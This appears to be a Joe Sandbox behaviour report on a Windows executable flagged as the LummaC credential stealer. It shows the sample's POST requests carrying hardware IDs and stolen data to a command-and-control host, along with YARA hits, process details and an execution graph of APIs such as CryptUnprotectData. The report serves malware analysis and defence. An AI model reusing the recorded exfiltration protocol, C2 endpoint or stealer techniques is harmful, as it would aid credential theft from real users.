                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2296&min_rtt=2289&rtt_var=873&sent=10&recv=17&lost=0&retrans=0&sent_bytes=2835&recv_bytes=13730&delivery_rate=1243611&cwnd=223&unsent_bytes=0&cid=f760cb91fa11416f&ts=1052&x=0"
                                                                                                                                                                                                                                                                        2024-12-28 08:59:05 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                        2024-12-28 08:59:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        4192.168.2.649728104.21.66.864433524C:\Users\user\Desktop\5Z19n7XRT1.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-28 08:59:07 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=12MYHXJSEBX
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 15058
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                        2024-12-28 08:59:07 UTC15058OUTData Raw: 2d 2d 31 32 4d 59 48 58 4a 53 45 42 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 31 37 37 42 36 36 31 35 46 42 39 30 46 43 46 39 46 31 42 37 31 33 36 41 31 45 30 43 35 45 0d 0a 2d 2d 31 32 4d 59 48 58 4a 53 45 42 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 31 32 4d 59 48 58 4a 53 45 42 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 31 32 4d 59 48 58 4a 53 45 42 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                                                                                                                                                                                                        Data Ascii: --12MYHXJSEBXContent-Disposition: form-data; name="hwid"F1177B6615FB90FCF9F1B7136A1E0C5E--12MYHXJSEBXContent-Disposition: form-data; name="pid"2--12MYHXJSEBXContent-Disposition: form-data; name="lid"4h5VfH----12MYHXJSEBXContent-D
                                                                                                                                                                                                                                                                        2024-12-28 08:59:07 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Sat, 28 Dec 2024 08:59:07 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=g077gi13thffbv9migdvt87u0u; expires=Wed, 23 Apr 2025 02:45:46 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d%2BXSDW5jiOHGYDoaLrClHRRcWeyspQG9Hrva7UkkbyBxg2wR9eD80KO2PvcNdoZbeHGjVBsIsuNTlNAFR5DMAMlEiwlidwNUCdsbyc7aagMdW3z%2FmY1HNxTCMHi69xY%2BhP4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f905a3a6d77728a-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1875&min_rtt=1823&rtt_var=721&sent=11&recv=19&lost=0&retrans=0&sent_bytes=2834&recv_bytes=15990&delivery_rate=1601755&cwnd=227&unsent_bytes=0&cid=5cc53d32f6a48626&ts=833&x=0"
                                                                                                                                                                                                                                                                        2024-12-28 08:59:07 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                        2024-12-28 08:59:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        5192.168.2.649737172.67.157.2544433524C:\Users\user\Desktop\5Z19n7XRT1.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-28 08:59:09 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=2520NUERQYQ21JEFV9
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 19958
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                        2024-12-28 08:59:09 UTC15331OUTData Raw: 2d 2d 32 35 32 30 4e 55 45 52 51 59 51 32 31 4a 45 46 56 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 31 37 37 42 36 36 31 35 46 42 39 30 46 43 46 39 46 31 42 37 31 33 36 41 31 45 30 43 35 45 0d 0a 2d 2d 32 35 32 30 4e 55 45 52 51 59 51 32 31 4a 45 46 56 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 32 35 32 30 4e 55 45 52 51 59 51 32 31 4a 45 46 56 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 32
                                                                                                                                                                                                                                                                        Data Ascii: --2520NUERQYQ21JEFV9Content-Disposition: form-data; name="hwid"F1177B6615FB90FCF9F1B7136A1E0C5E--2520NUERQYQ21JEFV9Content-Disposition: form-data; name="pid"3--2520NUERQYQ21JEFV9Content-Disposition: form-data; name="lid"4h5VfH----2
                                                                                                                                                                                                                                                                        2024-12-28 08:59:09 UTC4627OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5
                                                                                                                                                                                                                                                                        Data Ascii: +?2+?2+?o?Mp5p_
                                                                                                                                                                                                                                                                        2024-12-28 08:59:10 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Sat, 28 Dec 2024 08:59:10 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=bfhjvloio1nfji1mcg2uf4im7m; expires=Wed, 23 Apr 2025 02:45:49 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VRG1vJxdJ9E9khXsQtILd69Ket7PZ%2FDBnDEkc4rRy0nfw4SpVjFWd8aTQ5n1dag%2FP9J%2FmlrVTDvdxHY5B1866r4KytUC5kAZDymJ%2BefGDse5qcofjbaiACyZrET7XYTrG7k%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f905a49b8e118f2-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1531&min_rtt=1501&rtt_var=584&sent=11&recv=22&lost=0&retrans=0&sent_bytes=2835&recv_bytes=20919&delivery_rate=1945369&cwnd=232&unsent_bytes=0&cid=d394d981a16b5438&ts=984&x=0"
                                                                                                                                                                                                                                                                        2024-12-28 08:59:10 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                        2024-12-28 08:59:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                                                        Start time:03:58:50
                                                                                                                                                                                                                                                                        Start date:28/12/2024
                                                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\5Z19n7XRT1.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\5Z19n7XRT1.exe"
                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        File size:375'296 bytes
                                                                                                                                                                                                                                                                        MD5 hash:FB4F1803FBFC70BC55B61BF418D52D3D
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2391091654.0000000003038000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2390625549.00000000008B8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000003.2160718112.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2390650962.000000000092D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                                                                        Start time:03:59:09
                                                                                                                                                                                                                                                                        Start date:28/12/2024
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 1880
                                                                                                                                                                                                                                                                        Imagebase:0x290000
                                                                                                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                          Execution Coverage:3.4%
                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:21.2%
                                                                                                                                                                                                                                                                          Signature Coverage:62.1%
                                                                                                                                                                                                                                                                          Total number of Nodes:132
                                                                                                                                                                                                                                                                          Total number of Limit Nodes:11
                                                                                                                                                                                                                                                                          execution_graph 26355 4156a0 26356 4156a5 26355->26356 26366 4156fe 26356->26366 26372 43a9b0 LdrInitializeThunk 26356->26372 26358 415b79 26359 415cd0 26358->26359 26360 415c0b 26358->26360 26361 415ef8 26358->26361 26364 415ca6 26358->26364 26359->26361 26359->26364 26368 43cb20 26359->26368 26373 41bea0 LdrInitializeThunk 26360->26373 26374 41bea0 LdrInitializeThunk 26361->26374 26365 415948 CryptUnprotectData 26365->26358 26365->26366 26366->26358 26366->26365 26369 43cb40 26368->26369 26370 43cc5e 26369->26370 26375 43a9b0 LdrInitializeThunk 26369->26375 26370->26359 26372->26366 26373->26364 26374->26364 26375->26370 26376 4210e0 26389 43c9a0 26376->26389 26378 421832 26379 421123 26379->26378 26387 4211d2 26379->26387 26393 43a9b0 LdrInitializeThunk 26379->26393 26381 438e70 RtlFreeHeap 26382 4217ca 26381->26382 26382->26378 26395 43a9b0 LdrInitializeThunk 26382->26395 26384 4217af 26384->26381 26385 4218a0 26384->26385 26387->26384 26388 438e70 RtlFreeHeap 26387->26388 26394 43a9b0 LdrInitializeThunk 26387->26394 26388->26387 26390 43c9c0 26389->26390 26391 43cace 26390->26391 26396 43a9b0 LdrInitializeThunk 26390->26396 26391->26379 26393->26379 26394->26387 26395->26382 26396->26391 26294 40e648 CoInitializeSecurity 26405 43b068 26406 43b080 26405->26406 26409 43b16e 26406->26409 26411 43a9b0 LdrInitializeThunk 26406->26411 26408 43b23f 26409->26408 26412 43a9b0 LdrInitializeThunk 26409->26412 26411->26409 26412->26408 26295 40b44c 26296 40b57c 26295->26296 26298 40b45a 26295->26298 26296->26296 26297 40b65c 26300 43a950 2 API calls 26297->26300 26298->26296 26298->26297 26298->26298 26301 43a950 26298->26301 26300->26296 26302 43a976 26301->26302 26303 43a995 26301->26303 26304 43a968 26301->26304 26306 43a98a 26301->26306 26307 43a97b RtlReAllocateHeap 26302->26307 26308 438e70 26303->26308 26304->26302 26304->26303 26306->26297 26307->26306 26309 438e83 26308->26309 26310 438e94 26308->26310 26311 438e88 RtlFreeHeap 26309->26311 26310->26306 26311->26310 26312 43aecc 26314 43af00 26312->26314 26313 43af7e 26314->26313 26316 43a9b0 LdrInitializeThunk 26314->26316 26316->26313 26317 408790 26319 40879f 26317->26319 26318 408970 ExitProcess 26319->26318 26320 4087b4 GetCurrentProcessId GetCurrentThreadId 26319->26320 26321 408966 26319->26321 26322 4087da 26320->26322 26323 4087de SHGetSpecialFolderPathW GetForegroundWindow 26320->26323 26321->26318 26322->26323 26324 40887a 26323->26324 26324->26321 26325 40ea11 CoInitializeEx CoInitializeEx 26326 438e51 RtlAllocateHeap 26327 43ab91 26328 43ab9a GetForegroundWindow 26327->26328 26329 43abad 26328->26329 26413 420b30 26414 420b44 26413->26414 26418 420c51 26413->26418 26414->26414 26419 420c70 26414->26419 26420 420c80 26419->26420 26420->26420 26421 43cb20 LdrInitializeThunk 26420->26421 26422 420d8f 26421->26422 26423 40cff3 26424 40d010 26423->26424 26427 4361e0 26424->26427 26426 40d053 26426->26426 26428 436210 CoCreateInstance 26427->26428 26430 4367c2 26428->26430 26431 43641c SysAllocString 26428->26431 26432 4367d2 GetVolumeInformationW 26430->26432 26434 43648d 26431->26434 26442 4367f0 26432->26442 26435 4367b2 SysFreeString 26434->26435 26436 436495 CoSetProxyBlanket 26434->26436 26435->26430 26437 4364b5 SysAllocString 26436->26437 26438 4367a8 26436->26438 26440 436580 26437->26440 26438->26435 26440->26440 26441 43659c SysAllocString 26440->26441 26444 4365c3 26441->26444 26442->26426 26443 436796 SysFreeString SysFreeString 26443->26438 26444->26443 26445 436785 26444->26445 26446 43660e VariantInit 26444->26446 26445->26443 26448 436660 26446->26448 26447 436774 VariantClear 26447->26445 26448->26447 26330 8b8fde 26331 8b8fed 26330->26331 26334 8b977e 26331->26334 26339 8b9799 26334->26339 26335 8b97a2 CreateToolhelp32Snapshot 26336 8b97be Module32First 26335->26336 26335->26339 26337 8b97cd 26336->26337 26340 8b8ff6 26336->26340 26341 8b943d 26337->26341 26339->26335 26339->26336 26342 8b9468 26341->26342 26343 8b9479 VirtualAlloc 26342->26343 26344 8b94b1 26342->26344 26343->26344 26344->26344 26454 249003c 26455 2490049 26454->26455 26469 2490e0f SetErrorMode SetErrorMode 26455->26469 26460 2490265 26461 24902ce VirtualProtect 26460->26461 26463 249030b 26461->26463 26462 2490439 VirtualFree 26467 24905f4 LoadLibraryA 26462->26467 26468 24904be 26462->26468 26463->26462 26464 24904e3 LoadLibraryA 26464->26468 26466 24908c7 26467->26466 26468->26464 26468->26467 26470 2490223 26469->26470 26471 2490d90 26470->26471 26472 2490dad 26471->26472 26473 2490dbb GetPEB 26472->26473 26474 2490238 VirtualAlloc 26472->26474 26473->26474 26474->26460 26350 40d696 26352 40d6f0 26350->26352 26351 40d73e 26352->26351 26354 43a9b0 LdrInitializeThunk 26352->26354 26354->26351

                                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                                          Function 004361E0 Relevance: 33.9, APIs: 11, Strings: 8, Instructions: 636memorycomCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 0 4361e0-436202 1 436210-436222 0->1 1->1 2 436224-436235 1->2 3 436240-436272 2->3 3->3 4 436274-4362b1 3->4 5 4362c0-436342 4->5 5->5 6 436348-436367 5->6 8 436374-43637f 6->8 9 436369 6->9 10 436380-4363bd 8->10 9->8 10->10 11 4363bf-436416 CoCreateInstance 10->11 12 4367c2-4367ee call 43c280 GetVolumeInformationW 11->12 13 43641c-43644f 11->13 18 4367f0-4367f4 12->18 19 4367f8-4367fa 12->19 15 436450-436463 13->15 15->15 17 436465-43648f SysAllocString 15->17 24 4367b2-4367be SysFreeString 17->24 25 436495-4364af CoSetProxyBlanket 17->25 18->19 20 436817-43681e 19->20 22 436820-436827 20->22 23 436837-43684f 20->23 22->23 26 436829-436835 22->26 27 436850-436862 23->27 24->12 28 4364b5-4364ca 25->28 29 4367a8-4367ae 25->29 26->23 27->27 30 436864-4368a8 27->30 31 4364d0-4364f4 28->31 29->24 33 4368b0-43692d 30->33 31->31 32 4364f6-436576 SysAllocString 31->32 34 436580-43659a 32->34 33->33 35 43692f-43696a call 41dd50 33->35 34->34 36 43659c-4365cc SysAllocString 34->36 39 436970-436978 35->39 42 4365d2-4365f4 36->42 43 436796-4367a6 SysFreeString * 2 36->43 39->39 41 43697a-43697c 39->41 44 436982-436992 call 407fe0 41->44 45 436800-436811 41->45 50 4365fa-4365fd 42->50 51 43678c-436792 42->51 43->29 44->45 45->20 47 436997-43699e 45->47 50->51 52 436603-436608 50->52 51->43 52->51 53 43660e-436656 VariantInit 52->53 54 436660-436690 53->54 54->54 55 436692-4366a4 54->55 56 4366a8-4366aa 55->56 57 4366b0-4366b6 56->57 58 436774-436785 VariantClear 56->58 57->58 59 4366bc-4366ca 57->59 58->51 60 43670d 59->60 61 4366cc-4366d1 59->61 64 43670f-436737 call 407f60 call 408d90 60->64 63 4366ec-4366f0 61->63 65 4366f2-4366fb 63->65 66 4366e0 63->66 75 436739 64->75 76 43673e-43674a 64->76 69 436702-436706 65->69 70 4366fd-436700 65->70 68 4366e1-4366ea 66->68 68->63 68->64 69->68 72 436708-43670b 69->72 70->68 72->68 75->76 77 436751-436771 call 407f90 call 407f70 76->77 78 43674c 76->78 77->58 78->77
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CoCreateInstance.OLE32(0043F68C,00000000,00000001,0043F67C), ref: 0043640E
                                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(FA46F8B5), ref: 0043646A
                                                                                                                                                                                                                                                                          • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004364A7
                                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(w!s#), ref: 004364FB
                                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(A3q5), ref: 004365A1
                                                                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00436613
                                                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00436775
                                                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 004367A0
                                                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 004367A6
                                                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 004367B3
                                                                                                                                                                                                                                                                          • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 004367E7
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                                                                                                                                                                                                                          • String ID: A;$BC$C$T'g)$X&c8$Y/9Q$w!s#$z7}9A3q5
                                                                                                                                                                                                                                                                          • API String ID: 2573436264-4124187736
                                                                                                                                                                                                                                                                          • Opcode ID: 1a7a540a913549243f643d940beb1ec8542d667b59db154e60dd983501a017ec
                                                                                                                                                                                                                                                                          • Instruction ID: 522da010f1620deffab12e26d595bfb80e0736a5a48a815d81ab8756012ad252
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a7a540a913549243f643d940beb1ec8542d667b59db154e60dd983501a017ec
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7112EC72A083019BD314CF28C881B6BBBE5FFC9304F15992DF595DB290D778D9058B9A
                                                                                                                                                                                                                                                                          Function 00415298 Relevance: 9.9, APIs: 1, Strings: 4, Instructions: 1123COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: in~x$kmbj$ydij$Z\
                                                                                                                                                                                                                                                                          • API String ID: 0-979945983
                                                                                                                                                                                                                                                                          • Opcode ID: 26ca6100dcfc97b8c0c6fbf8c4ee366fc87c8afe50c98e0e46493e49499a4975
                                                                                                                                                                                                                                                                          • Instruction ID: a7131c4719c006be066284edc26e6de5161f51a5f0bff666fc31d9b99828dd7c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26ca6100dcfc97b8c0c6fbf8c4ee366fc87c8afe50c98e0e46493e49499a4975
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 107249B5600701CFD7248F28D8817A7B7B2FF96314F18856EE4968B392E739E842CB55
                                                                                                                                                                                                                                                                          Function 004210E0 Relevance: 8.0, Strings: 6, Instructions: 536COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
